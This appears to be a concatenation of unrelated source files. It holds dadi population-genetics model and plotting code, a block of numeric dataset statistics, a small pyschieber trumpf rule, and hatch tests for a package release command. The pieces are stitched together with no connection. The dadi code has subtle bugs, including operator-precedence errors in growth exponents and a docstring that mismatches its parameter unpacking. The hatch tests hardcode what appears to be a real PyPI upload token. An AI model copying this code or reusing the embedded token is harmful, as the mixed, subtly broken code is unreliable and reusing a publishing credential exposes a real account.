def OutOfAfrica_mig_admix2((nuAf, nuEu0, nuEu, nuNA0, nuNA,
        TAf, TB, TEuNA,T_ad,p_ad,mAf_Eu,mAf_NA,mEu_Af,mEu_NA,mNA_Af,mNA_Eu, p_misid), (n1,n2,n3), pts):
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA+T_ad))
    phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
            m12=mAf_Eu, m21=mEu_Af)
    nuEu0 = nuEu_func(TB)
    phi = dadi.PhiManip.phi_2D_to_3D_admix(phi,p_ad,xx,xx,xx)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/TEuNA)
    nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
    phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
            nu2=nuEu_func, nu3=nuNA_func,
            m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
            m31=mNA_Af, m32=mNA_Eu)
    fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
###################################################
################## Two Populations
##two population model with misorientation
def IM_misorient_5epoch(params, ns, pts):
    """
    ns = (n1,n2)
    params = (nu1_0,nu1_1,nu1_2,nu1_3,nu1_4,nu2_0,nu2_1,nu2_2,nu2_3,nu2_4,t0,t1,t2,t3,t4,m12,m21,p_misid)
    Isolation-with-migration model with exponential pop growth.
    nu1_0: Size of pop 1 after split.
    nu2_0: Size of pop 2 after split.
    nu1: Final size of pop 1.
    nu2: Final size of pop 2.
    T: Time in the past of split (in units of 2*Na generations)
    m12: Migration from pop 2 to pop 1 (2*Na*m12)
    m21: Migration from pop 1 to pop 2
    n1,n2: Sample sizes of resulting Spectrum
    pts: Number of grid points to use in integration.
    """
    nu1_0,nu1_1,nu1_2,nu1_3,nu1_4,nu2_0,nu2_1,nu2_2,nu2_3,nu2_4,t0,t1,t2,t3,t4,m12,m21,p_misid = params
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    phi = dadi.Integration.two_pops(phi, xx, t0, nu1_0, nu2_0,
            m12=m12, m21=m21)
    phi = dadi.Integration.two_pops(phi, xx, t1, nu1_1, nu2_1,
            m12=m12, m21=m21)
    phi = dadi.Integration.two_pops(phi, xx, t2, nu1_2, nu2_2,
            m12=m12, m21=m21)
    phi = dadi.Integration.two_pops(phi, xx, t3, nu1_3, nu2_3,
            m12=m12, m21=m21)
    phi = dadi.Integration.two_pops(phi, xx, t4, nu1_4, nu2_4,
            m12=m12, m21=m21)
    fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##two population model with misorientation
def IM_misorient(params, ns, pts):
    """
    ns = (n1,n2)
    params = (nu1_0,nu2_0,nu1,nu2,T,m12,m21,p_misid)
    Isolation-with-migration model with exponential pop growth.
    nu1_0: Size of pop 1 after split.
    nu2_0: Size of pop 2 after split.
    nu1: Final size of pop 1.
    nu2: Final size of pop 2.
    T: Time in the past of split (in units of 2*Na generations)
    m12: Migration from pop 2 to pop 1 (2*Na*m12)
    m21: Migration from pop 1 to pop 2
    n1,n2: Sample sizes of resulting Spectrum
    pts: Number of grid points to use in integration.
    """
    nu1_0,nu2_0,nu1,nu2,T,m12,m21,p_misid = params
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/T)
    nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/T)
    phi = dadi.Integration.two_pops(phi, xx, T, nu1_func, nu2_func,
            m12=m12, m21=m21)
    fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##two population model with misorientation
def IM_misorient_noMig(params, ns, pts):
    """
    ns = (n1,n2)
    params = (nu1_0,nu2_0,nu1,nu2,T,m12,m21,p_misid)
    Isolation-with-migration model with exponential pop growth.
    nu1_0: Size of pop 1 after split.
    nu2_0: Size of pop 2 after split.
    nu1: Final size of pop 1.
    nu2: Final size of pop 2.
    T: Time in the past of split (in units of 2*Na generations)
    n1,n2: Sample sizes of resulting Spectrum
    pts: Number of grid points to use in integration.
    """
    nu1_0,nu2_0,nu1,nu2,T,p_misid = params
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/T)
    nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/T)
    phi = dadi.Integration.two_pops(phi, xx, T, nu1_func, nu2_func,
            m12=0, m21=0)
    fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##two population model with misorientation
def IM_misorient_admix(params, ns, pts):
    """
    ns = (n1,n2)
    params = (nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad,p_ad,p_misid)
    Isolation-with-migration model with exponential pop growth.
    nu1_0: Size of pop 1 after split.
    nu2_0: Size of pop 2 after split.
    nu1: Final size of pop 1.
    nu2: Final size of pop 2.
    T: Time in the past of split (in units of 2*Na generations)
    m12: Migration from pop 2 to pop 1 (2*Na*m12)
    m21: Migration from pop 1 to pop 2
    n1,n2: Sample sizes of resulting Spectrum
    pts: Number of grid points to use in integration.
    """
    nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad,p_ad,p_misid = params
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/(T+t_ad))
    nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/(T+t_ad))
    phi = dadi.Integration.two_pops(phi, xx, T, nu1_func, nu2_func,
            m12=m12, m21=m21)
    phi = dadi.PhiManip.phi_2D_admix_1_into_2(phi, p_ad, xx,xx)
    nu1_0 = nu1_func(t_ad)
    nu2_0 = nu2_func(t_ad)
    nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/t_ad)
    nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/t_ad)
    phi = dadi.Integration.two_pops(phi, xx, t_ad, nu1_func, nu2_func,
            m12=m12, m21=m21)
    fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##two population model with misorientation
def IM_misorient_doubleAdmix(params, ns, pts):
    """
    ns = (n1,n2)
    params = (nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad1,p_ad1,t_ad2,p_ad2,p_misid)
    Isolation-with-migration model with exponential pop growth.
    nu1_0: Size of pop 1 after split.
    nu2_0: Size of pop 2 after split.
    nu1: Final size of pop 1.
    nu2: Final size of pop 2.
    T: Time in the past of split (in units of 2*Na generations)
    m12: Migration from pop 2 to pop 1 (2*Na*m12)
    m21: Migration from pop 1 to pop 2
    n1,n2: Sample sizes of resulting Spectrum
    pts: Number of grid points to use in integration.
    """
    nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad1,p_ad1,t_ad2,p_ad2,p_misid = params
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/(T+t_ad1+t_ad2))
    nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/(T+t_ad1+t_ad2))
    phi = dadi.Integration.two_pops(phi, xx, T, nu1_func, nu2_func,
            m12=m12, m21=m21)
    phi = dadi.PhiManip.phi_2D_admix_1_into_2(phi, p_ad1, xx,xx)
    nu1_0 = nu1_func(t_ad1)
    nu2_0 = nu2_func(t_ad1)
    nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/t_ad1+t_ad2)
    nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/t_ad1+t_ad2)
    phi = dadi.Integration.two_pops(phi, xx, t_ad1, nu1_func, nu2_func,
            m12=m12, m21=m21)
    phi = dadi.PhiManip.phi_2D_admix_1_into_2(phi, p_ad2, xx,xx)
    nu1_0 = nu1_func(t_ad2)
    nu2_0 = nu2_func(t_ad2)
    nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/t_ad2)
    nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/t_ad2)
    phi = dadi.Integration.two_pops(phi, xx, t_ad2, nu1_func, nu2_func,
            m12=m12, m21=m21)
    fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##two population model with misorientation
def IM_misorient_doubleAdmix_noMig(params, ns, pts):
    """
    ns = (n1,n2)
    params = (nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad1,p_ad1,t_ad2,p_ad2,p_misid)
    Isolation-with-migration model with exponential pop growth.
    nu1_0: Size of pop 1 after split.
    nu2_0: Size of pop 2 after split.
    nu1: Final size of pop 1.
    nu2: Final size of pop 2.
    T: Time in the past of split (in units of 2*Na generations)
    n1,n2: Sample sizes of resulting Spectrum
    pts: Number of grid points to use in integration.
    """
    nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad1,p_ad1,t_ad2,p_ad2,p_misid = params
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/(T+t_ad1+t_ad2))
    nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/(T+t_ad1+t_ad2))
    phi = dadi.Integration.two_pops(phi, xx, T, nu1_func, nu2_func,
            m12=0, m21=0)
    phi = dadi.PhiManip.phi_2D_admix_1_into_2(phi, p_ad1, xx,xx)
    nu1_0 = nu1_func(t_ad1)
    nu2_0 = nu2_func(t_ad1)
    nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/t_ad1+t_ad2)
    nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/t_ad1+t_ad2)
    phi = dadi.Integration.two_pops(phi, xx, t_ad1, nu1_func, nu2_func,
            m12=0, m21=0)
    phi = dadi.PhiManip.phi_2D_admix_1_into_2(phi, p_ad2, xx,xx)
    nu1_0 = nu1_func(t_ad2)
    nu2_0 = nu2_func(t_ad2)
    nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/t_ad2)
    nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/t_ad2)
    phi = dadi.Integration.two_pops(phi, xx, t_ad2, nu1_func, nu2_func,
            m12=0, m21=0)
    fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##two population model with misorientation
def IM_misorient_noMig_admix(params, ns, pts):
    """
    ns = (n1,n2)
    params = (nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad,p_ad,p_misid)
    Isolation-with-migration model with exponential pop growth.
    nu1_0: Size of pop 1 after split.
    nu2_0: Size of pop 2 after split.
    nu1: Final size of pop 1.
    nu2: Final size of pop 2.
    T: Time in the past of split (in units of 2*Na generations)
    n1,n2: Sample sizes of resulting Spectrum
    pts: Number of grid points to use in integration.
    """
    nu1_0,nu2_0,nu1,nu2,T,t_ad,p_ad,p_misid = params
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/(T+t_ad))
    nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/(T+t_ad))
    phi = dadi.Integration.two_pops(phi, xx, T, nu1_func, nu2_func,
            m12=0, m21=0)
    phi = dadi.PhiManip.phi_2D_admix_1_into_2(phi, p_ad, xx,xx)
    nu1_0 = nu1_func(t_ad)
    nu2_0 = nu2_func(t_ad)
    nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/t_ad)
    nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/t_ad)
    phi = dadi.Integration.two_pops(phi, xx, t_ad, nu1_func, nu2_func,
            m12=0, m21=0)
    fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##########################
#######
#### Helper functions
def makeRandomParams(lower,upper):
    pNew=numpy.zeros(len(lower))
    for i in range(len(lower)):
        pNew[i]= numpy.random.uniform(lower[i],upper[i])
    return pNew
def plot2file_3d_comp_multinom(model, data, filename, vmin=None, vmax=None,
        resid_range=None, fig_num=None,
        pop_ids=None, residual='Anscombe', adjust=True):
    """
    Multinomial comparison between 3d model and data.
    model: 3-dimensional model SFS
    data: 3-dimensional data SFS
    vmin, vmax: Minimum and maximum values plotted for sfs are vmin and
        vmax respectively.
    resid_range: Residual plot saturates at +- resid_range.
    fig_num: Clear and use figure fig_num for display. If None, a new figure
        window is created.
    pop_ids: If not None, override pop_ids stored in Spectrum.
    residual: 'Anscombe' for Anscombe residuals, which are more normally
        distributed for Poisson sampling. 'linear' for the linear
        residuals, which can be less biased.
    adjust: Should method use automatic 'subplots_adjust'? For advanced
        manipulation of plots, it may be useful to make this False.
    This comparison is multinomial in that it rescales the model to optimally
    fit the data.
    """
    model = dadi.Inference.optimally_scaled_sfs(model, data)
    plot2file_3d_comp_Poisson(model, data, filename, vmin=vmin, vmax=vmax,
            resid_range=resid_range, fig_num=fig_num,
            pop_ids=pop_ids, residual=residual,
            adjust=adjust)
def plot2file_3d_comp_Poisson(model, data, filename, vmin=None, vmax=None,
        resid_range=None, fig_num=None, pop_ids=None,
        residual='Anscombe', adjust=True):
    """
    Poisson comparison between 3d model and data.
    model: 3-dimensional model SFS
    data: 3-dimensional data SFS
    vmin, vmax: Minimum and maximum values plotted for sfs are vmin and
        vmax respectively.
    resid_range: Residual plot saturates at +- resid_range.
    fig_num: Clear and use figure fig_num for display. If None, a new figure
        window is created.
    pop_ids: If not None, override pop_ids stored in Spectrum.
    residual: 'Anscombe' for Anscombe residuals, which are more normally
        distributed for Poisson sampling. 'linear' for the linear
        residuals, which can be less biased.
    adjust: Should method use automatic 'subplots_adjust'? For advanced
        manipulation of plots, it may be useful to make this False.
    """
    if data.folded and not model.folded:
        model = model.fold()
    masked_model, masked_data = dadi.Numerics.intersect_masks(model, data)
    if fig_num is None:
        f = pylab.gcf()
    else:
        f = pylab.figure(fig_num, figsize=(8,10))
    pylab.clf()
    if adjust:
        pylab.subplots_adjust(bottom=0.07, left=0.07, top=0.95, right=0.95)
    modelmax = max(masked_model.sum(axis=sax).max() for sax in range(3))
    datamax = max(masked_data.sum(axis=sax).max() for sax in range(3))
    modelmin = min(masked_model.sum(axis=sax).min() for sax in range(3))
    datamin = min(masked_data.sum(axis=sax).min() for sax in range(3))
    max_toplot = max(modelmax, datamax)
    min_toplot = min(modelmin, datamin)
    if vmax is None:
        vmax = max_toplot
    if vmin is None:
        vmin = min_toplot
    extend = dadi.Plotting._extend_mapping[vmin <= min_toplot, vmax >= max_toplot]
    # Calculate the residuals
    if residual == 'Anscombe':
        resids = [dadi.Inference.\
                Anscombe_Poisson_residual(masked_model.sum(axis=2-sax),
                    masked_data.sum(axis=2-sax),
                    mask=vmin) for sax in range(3)]
    elif residual == 'linear':
        resids = [dadi.Inference.\
                linear_Poisson_residual(masked_model.sum(axis=2-sax),
                    masked_data.sum(axis=2-sax),
                    mask=vmin) for sax in range(3)]
    else:
        raise ValueError("Unknown class of residual '%s'." % residual)
    min_resid = min([r.min() for r in resids])
    max_resid = max([r.max() for r in resids])
    if resid_range is None:
        resid_range = max((abs(max_resid), abs(min_resid)))
    resid_extend = dadi.Plotting._extend_mapping[-resid_range <= min_resid,
            resid_range >= max_resid]
    if pop_ids is not None:
        if len(pop_ids) != 3:
            raise ValueError('pop_ids must be of length 3.')
        data_ids = model_ids = resid_ids = pop_ids
    else:
        data_ids = masked_data.pop_ids
        model_ids = masked_model.pop_ids
        if model_ids is None:
            model_ids = data_ids
        if model_ids == data_ids:
            resid_ids = model_ids
        else:
            resid_ids = None
    for sax in range(3):
        marg_data = masked_data.sum(axis=2-sax)
        marg_model = masked_model.sum(axis=2-sax)
        curr_ids = []
        for ids in [data_ids, model_ids, resid_ids]:
            if ids is None:
                ids = ['pop0', 'pop1', 'pop2']
            if ids is not None:
                ids = list(ids)
                del ids[2-sax]
            curr_ids.append(ids)
        ax = pylab.subplot(4,3,sax+1)
        plot_colorbar = (sax == 2)
        dadi.Plotting.plot_single_2d_sfs(marg_data, vmin=vmin, vmax=vmax, pop_ids=curr_ids[0],
                extend=extend, colorbar=plot_colorbar)
        pylab.subplot(4,3,sax+4, sharex=ax, sharey=ax)
        dadi.Plotting.plot_single_2d_sfs(marg_model, vmin=vmin, vmax=vmax,
                pop_ids=curr_ids[1], extend=extend, colorbar=False)
        resid = resids[sax]
        pylab.subplot(4,3,sax+7, sharex=ax, sharey=ax)
        dadi.Plotting.plot_2d_resid(resid, resid_range, pop_ids=curr_ids[2],
                extend=resid_extend, colorbar=plot_colorbar)
        ax = pylab.subplot(4,3,sax+10)
        flatresid = numpy.compress(numpy.logical_not(resid.mask.ravel()),
                resid.ravel())
        ax.hist(flatresid, bins=20, normed=True)
        ax.set_yticks([])
    pylab.savefig(filename, bbox_inches='tight')
################################################
## MS stuff
## and discoal... and msAdmix....
##########
def IM_misorient_admix_core(params):
    """
    msAdmix core command for IM_misorient_admix.
    """
    nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad,p_ad,p_misid = params
    alpha1 = numpy.log(nu1/nu1_0)/T
    alpha2 = numpy.log(nu2/nu2_0)/T
    command = "-n 1 %(nu1)f -n 2 %(nu2)f "\
            "-eg 0 1 %(alpha1)f -eg 0 2 %(alpha2)f "\
            "-ma x %(m12)f %(m21)f x "\
            "-eA %(t_ad)f 2 1 %(p_ad)f "\
            "-ej %(T)f 2 1 -en %(T)f 1 1"
    sub_dict = {'nu1':nu1, 'nu2':nu2, 'alpha1':2*alpha1, 'alpha2':2*alpha2,
            'm12':2*m12, 'm21':2*m21, 'T': T/2, 't_ad':t_ad/2, 'p_ad':p_ad}
    return command % sub_dict
def msAdmix_command(theta, ns, core, iter, recomb=0, rsites=None):
    """
    Generate ms command for simulation from core.
    theta: Assumed theta
    ns: Sample sizes
    core: Core of ms command that specifies demography.
    iter: Iterations to run ms
    recomb: Assumed recombination rate
    rsites: Sites for recombination. If None, default is 10*theta.
    """
    if len(ns) > 1:
        ms_command = "msAdmix %(total_chrom)i %(iter)i -t %(theta)f -I %(numpops)i "\
                "%(sample_sizes)s %(core)s"
    else:
        ms_command = "msAdmix %(total_chrom)i %(iter)i -t %(theta)f %(core)s"
    if recomb:
        ms_command = ms_command + " -r %(recomb)f %(rsites)i"
        if not rsites:
            rsites = theta*10
    sub_dict = {'total_chrom': numpy.sum(ns), 'iter': iter, 'theta': theta,
            'numpops': len(ns), 'sample_sizes': ' '.join(map(str, ns)),
            'core': core, 'recomb': recomb, 'rsites': rsites}
    return ms_command % sub_dict
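All of the demographic functions above follow dadi's (params, ns, pts) convention, so any of them drops into dadi's standard fitting workflow. A sketch of that workflow for IM_misorient follows; the data file name, grid sizes, starting values, and bounds are illustrative placeholders, not values from this project.
# Hypothetical fitting sketch using dadi's extrapolation/optimisation API.
import dadi

data = dadi.Spectrum.from_file('example.fs')    # placeholder SFS file
ns = data.sample_sizes
pts_l = [40, 50, 60]                            # extrapolation grid sizes

func_ex = dadi.Numerics.make_extrap_log_func(IM_misorient)

# params = (nu1_0, nu2_0, nu1, nu2, T, m12, m21, p_misid)
p0 = [1, 1, 1, 1, 0.1, 1, 1, 0.01]
popt = dadi.Inference.optimize_log(p0, data, func_ex, pts_l,
        lower_bound=[1e-2]*7 + [1e-3],
        upper_bound=[10, 10, 10, 10, 5, 20, 20, 0.5],
        maxiter=20)
model = func_ex(popt, ns, pts_l)
ll = dadi.Inference.ll_multinom(model, data)    # composite log-likelihood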
| 40.219245
| 114
| 0.598425
| 5,265
| 33,020
| 3.558405
| 0.061159
| 0.042968
| 0.047238
| 0.056685
| 0.851241
| 0.84222
| 0.835442
| 0.82957
| 0.818628
| 0.811636
| 0
| 0.063707
| 0.270775
| 33,020
| 820
| 115
| 40.268293
| 0.714357
| 0.014264
| 0
| 0.695122
| 0
| 0.002033
| 0.018839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.00813
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68c72b194660df345e2751a9e96b4cedd4b7eaf9
| 149
|
py
|
Python
|
pyschieber/rules/trumpf_rules.py
|
Murthy10/pyschieber
|
f9db28c9553b8f321f6ed71cff04eff7879af5f6
|
[
"MIT"
] | 5
|
2018-01-17T08:11:14.000Z
|
2018-11-27T11:37:15.000Z
|
pyschieber/rules/trumpf_rules.py
|
Murthy10/pyschieber
|
f9db28c9553b8f321f6ed71cff04eff7879af5f6
|
[
"MIT"
] | 4
|
2018-05-09T08:41:05.000Z
|
2018-11-16T08:07:39.000Z
|
pyschieber/rules/trumpf_rules.py
|
Murthy10/pyschieber
|
f9db28c9553b8f321f6ed71cff04eff7879af5f6
|
[
"MIT"
] | 3
|
2018-04-20T07:39:30.000Z
|
2018-11-10T12:44:08.000Z
|
from pyschieber.trumpf import Trumpf
def trumpf_allowed(chosen_trumpf, geschoben):
    return not (chosen_trumpf == Trumpf.SCHIEBEN and geschoben)
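In Schieber, a player who has already been pushed the trumpf decision (geschoben) may not push it back, which is exactly what this predicate encodes. A small illustration, assuming only the Trumpf.SCHIEBEN member shown above:
# Illustration of the rule; only Trumpf.SCHIEBEN from the import is assumed.
assert trumpf_allowed(Trumpf.SCHIEBEN, geschoben=False)       # pushing is fine...
assert not trumpf_allowed(Trumpf.SCHIEBEN, geschoben=True)    # ...but not pushing back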
| 24.833333
| 63
| 0.798658
| 19
| 149
| 6.105263
| 0.631579
| 0.206897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134228
| 149
| 5
| 64
| 29.8
| 0.899225
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
68e19903599253c1b69975d33efd14fcae8acc44
| 173
|
py
|
Python
|
app/schemas/__init__.py
|
congdh/fastapi-async-realworld
|
608dc6f090f8a02e0a880cef33dca90df78cbfb5
|
[
"MIT"
] | null | null | null |
app/schemas/__init__.py
|
congdh/fastapi-async-realworld
|
608dc6f090f8a02e0a880cef33dca90df78cbfb5
|
[
"MIT"
] | null | null | null |
app/schemas/__init__.py
|
congdh/fastapi-async-realworld
|
608dc6f090f8a02e0a880cef33dca90df78cbfb5
|
[
"MIT"
] | 3
|
2020-10-04T09:37:21.000Z
|
2022-02-13T08:57:35.000Z
|
from .user import * # noqa # isort:skip
from .profile import * # noqa # isort:skip
from .article import * # noqa # isort:skip
from .comment import * # noqa # isort:skip
| 34.6
| 43
| 0.676301
| 24
| 173
| 4.875
| 0.375
| 0.34188
| 0.512821
| 0.649573
| 0.589744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208092
| 173
| 4
| 44
| 43.25
| 0.854015
| 0.387283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
68fb6fca2339f9bd3e3162d438a395b3d8022eda
| 12,828
|
py
|
Python
|
tests/commands/test_release.py
|
williamirick/hatch
|
704cdcd1a0cd3a621235ac9f5b2b90e7524e3cd3
|
[
"Apache-2.0",
"MIT"
] | 2,549
|
2017-09-05T06:44:17.000Z
|
2022-03-31T23:21:02.000Z
|
tests/commands/test_release.py
|
williamirick/hatch
|
704cdcd1a0cd3a621235ac9f5b2b90e7524e3cd3
|
[
"Apache-2.0",
"MIT"
] | 97
|
2017-06-07T23:14:12.000Z
|
2022-03-30T14:22:34.000Z
|
tests/commands/test_release.py
|
williamirick/hatch
|
704cdcd1a0cd3a621235ac9f5b2b90e7524e3cd3
|
[
"Apache-2.0",
"MIT"
] | 140
|
2017-06-10T14:16:47.000Z
|
2022-03-23T09:25:01.000Z
|
import os
from click.testing import CliRunner
from twine.utils import TEST_REPOSITORY
from hatch.cli import hatch
from hatch.env import install_packages
from hatch.settings import SETTINGS_FILE, copy_default_settings, save_settings
from hatch.utils import env_vars, temp_chdir, temp_move_path
from hatch.venv import create_venv, venv
from ..utils import requires_internet
PACKAGE_NAME = 'e00f69943529ccc38058'
USERNAME = '__token__'
PASSWORD = (
    'pypi-AgENdGVzdC5weXBpLm9yZwIkZjBlMDRiYzUtOTE3MC00ZDdhLTkzMjMtZjNmMjU2MmJhOGNmAAJFeyJwZXJtaXNzaW9ucyI6IHsicHJvam'
    'VjdHMiOiBbImUwMGY2OTk0MzUyOWNjYzM4MDU4Il19LCAidmVyc2lvbiI6IDF9AAAGIEGPIQmW2Gpmi6YbaAzk2lT_26QnavujWgjrIKYVymbt'
)
ENV_VARS = {'TWINE_PASSWORD': PASSWORD}
@requires_internet
def test_cwd():
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
        runner.invoke(hatch, ['build'])
        os.chdir(os.path.join(d, 'dist'))
        with env_vars(ENV_VARS):
            result = runner.invoke(hatch, ['release', '-u', USERNAME, '-t'])
        assert result.exit_code == 0
@requires_internet
def test_username_env():
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
        runner.invoke(hatch, ['build'])
        os.chdir(os.path.join(d, 'dist'))
        with temp_move_path(SETTINGS_FILE, d):
            settings = copy_default_settings()
            settings['pypi_username'] = ''
            save_settings(settings)
            extra_env_vars = {'TWINE_USERNAME': USERNAME, **ENV_VARS}
            with env_vars(extra_env_vars):
                result = runner.invoke(hatch, ['release', '-t'])
        assert result.exit_code == 0
@requires_internet
def test_cwd_dist_exists():
    with temp_chdir():
        runner = CliRunner()
        runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
        runner.invoke(hatch, ['build'])
        with env_vars(ENV_VARS):
            result = runner.invoke(hatch, ['release', '-u', USERNAME, '-t'])
        assert result.exit_code == 0
@requires_internet
def test_package():
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
        runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
        package_dir = os.path.join(d, PACKAGE_NAME)
        venv_dir = os.path.join(d, 'venv')
        create_venv(venv_dir)
        with venv(venv_dir, evars=ENV_VARS):
            os.chdir(package_dir)
            install_packages(['-e', '.'])
            os.chdir(d)
            result = runner.invoke(hatch, ['release', PACKAGE_NAME, '-u', USERNAME, '-t'])
        assert result.exit_code == 0
def test_package_not_exist():
    with temp_chdir() as d:
        runner = CliRunner()
        venv_dir = os.path.join(d, 'venv')
        create_venv(venv_dir)
        with venv(venv_dir, evars=ENV_VARS):
            result = runner.invoke(hatch, ['release', PACKAGE_NAME, '-u', USERNAME, '-t'])
        assert result.exit_code == 1
        assert '`{}` is not an editable package.'.format(PACKAGE_NAME) in result.output
@requires_internet
def test_local():
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
        runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
        package_dir = os.path.join(d, PACKAGE_NAME)
        venv_dir = os.path.join(d, 'venv')
        create_venv(venv_dir)
        with venv(venv_dir, evars=ENV_VARS):
            install_packages(['-e', package_dir])
            result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME, '-t'])
        assert result.exit_code == 0
def test_local_not_exist():
    with temp_chdir() as d:
        runner = CliRunner()
        venv_dir = os.path.join(d, 'venv')
        create_venv(venv_dir)
        with venv(venv_dir):
            result = runner.invoke(hatch, ['release', '-l'])
